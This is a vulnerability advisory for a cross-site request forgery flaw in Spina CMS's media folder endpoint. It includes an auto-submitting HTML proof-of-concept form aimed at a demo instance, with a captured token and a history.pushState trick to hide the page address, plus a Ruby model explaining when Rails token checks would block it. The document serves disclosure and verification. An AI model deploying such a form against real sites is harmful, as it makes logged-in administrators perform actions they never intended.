[description]
Spina CMS v2.18.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the URI /admin/media_folders. A logged-in administrator who visits an attacker-controlled page has a media folder created in their account by an auto-submitted cross-origin POST, with no further interaction. The PoC below embeds a static authenticity_token captured from the demo instance; before treating the endpoint as vulnerable, confirm that the request is still accepted with that field removed or altered, since an enforced Rails token check would reject a forged submission.
[Vulnerability Type]
Cross-Site Request Forgery (CSRF)
[Vendor of Product]
Spina CMS, https://github.com/SpinaCMS/Spina
[Affected Product Code Base]
<=v2.18.0
[Impact Escalation of Privileges]
true
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<!-- Auto-submitting cross-origin POST to the media folder creation endpoint.
     Host this page on an attacker-controlled origin and have a logged-in Spina
     administrator open it; the browser attaches the victim's session cookie. -->
<form action="https://spinacms-demo.herokuapp.com/admin/media_folders" method="POST">
<!-- Rails' UTF-8 enforcer parameter, copied from the legitimate form -->
<input type="hidden" name="utf8" value="✓" />
<!-- Static authenticity_token captured from the demo instance. The CSRF only
     holds if the endpoint accepts the request with this value removed or
     altered; verify that before relying on the PoC. -->
<input type="hidden" name="authenticity_token" value="YHbA/a9JxqaH6dBpw3EnP/vL2WzJM6L8obuUr1uIhkUlET/JRM987f66bvcMD8BHXIsfY0WLMinCaXd+k+Ka7Q==" />
<!-- Name of the media folder the victim unknowingly creates -->
<input type="hidden" name="media_folder[name]" value="123" />
<input type="submit" value="Submit request" />
</form>
<script>
// Rewrite the visible URL to "/" so the PoC page address does not linger
// in the address bar, then submit the form without any user interaction
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
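The PoC form carries a static authenticity_token. Whether that is enough for a forged request to succeed depends entirely on whether the endpoint still verifies the token. The following Ruby model, added here as an example and not code from Spina or Rails, re-implements the masked-token scheme Rails uses (simplified: per-form tokens, the X-CSRF-Token header and origin checking are left out), decodes the PoC's token, and shows that it cannot verify against a session whose secret the attacker does not hold, so the CSRF is only real if forgery protection is skipped for this action. POC_TOKEN is copied from the form above; every other name is this example's own.

```ruby
require 'base64'
require 'securerandom'

# Added example, not Spina's or Rails' own code: a simplified model of the
# masked authenticity token scheme Rails uses, so the token embedded in the
# PoC can be examined offline and the condition for the CSRF to work is explicit.
# Constructed from the page: the authenticity_token value in the PoC form.
POC_TOKEN = 'YHbA/a9JxqaH6dBpw3EnP/vL2WzJM6L8obuUr1uIhkUlET/JRM987f66bvcMD8BHXIsfY0WLMinCaXd+k+Ka7Q=='

TOKEN_LENGTH = 32 # bytes of per-session secret

# Per-session random secret; Rails keeps this in the session cookie.
def generate_session_token
  SecureRandom.random_bytes(TOKEN_LENGTH)
end

# Byte-wise XOR of two equal-length binary strings.
def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Each rendered form gets a fresh masked copy of the secret:
# Base64(one_time_pad || (one_time_pad XOR secret)). Masking makes every
# token different on the wire, which is why Rails masks them at all.
def mask_token(secret)
  pad = SecureRandom.random_bytes(TOKEN_LENGTH)
  Base64.strict_encode64(pad + xor_bytes(pad, secret))
end

# Recover the raw secret from a submitted token; nil if malformed.
def unmask_token(encoded)
  decoded = Base64.strict_decode64(encoded)
  return nil unless decoded.bytesize == 2 * TOKEN_LENGTH
  pad = decoded[0, TOKEN_LENGTH]
  masked = decoded[TOKEN_LENGTH, TOKEN_LENGTH]
  xor_bytes(pad, masked)
rescue ArgumentError
  nil
end

# Constant-time comparison so a wrong token cannot be found byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server-side check: the submitted token must unmask to the victim's secret.
def valid_authenticity_token?(session_secret, submitted)
  raw = unmask_token(submitted)
  !raw.nil? && secure_compare(raw, session_secret)
end

# Model of the controller's decision for POST /admin/media_folders:
# with forgery protection active the token must verify; with it skipped
# (or the action excluded from verification) any cross-origin POST is accepted.
def request_accepted?(forgery_protection_active, session_secret, submitted_token)
  return true unless forgery_protection_active
  valid_authenticity_token?(session_secret, submitted_token)
end

if __FILE__ == $PROGRAM_NAME
  victim_secret = generate_session_token # unknown to the attacker
  puts "PoC token well-formed (64 bytes): #{!unmask_token(POC_TOKEN).nil?}"
  puts "Verified against victim session:  #{valid_authenticity_token?(victim_secret, POC_TOKEN)}"
  puts "Accepted with protection active:  #{request_accepted?(true, victim_secret, POC_TOKEN)}"
  puts "Accepted with protection skipped: #{request_accepted?(false, victim_secret, POC_TOKEN)}"
end
```

Running it shows the captured token is structurally valid (a 64-byte pad-plus-masked-secret blob) but verifies only against the session it was issued for; the forged request is accepted solely in the branch where protection is inactive. That is the fact to establish against the live endpoint: replay the PoC with the authenticity_token field stripped or replaced by a freshly generated one from an unrelated session, and only treat /admin/media_folders as vulnerable if the folder is still created.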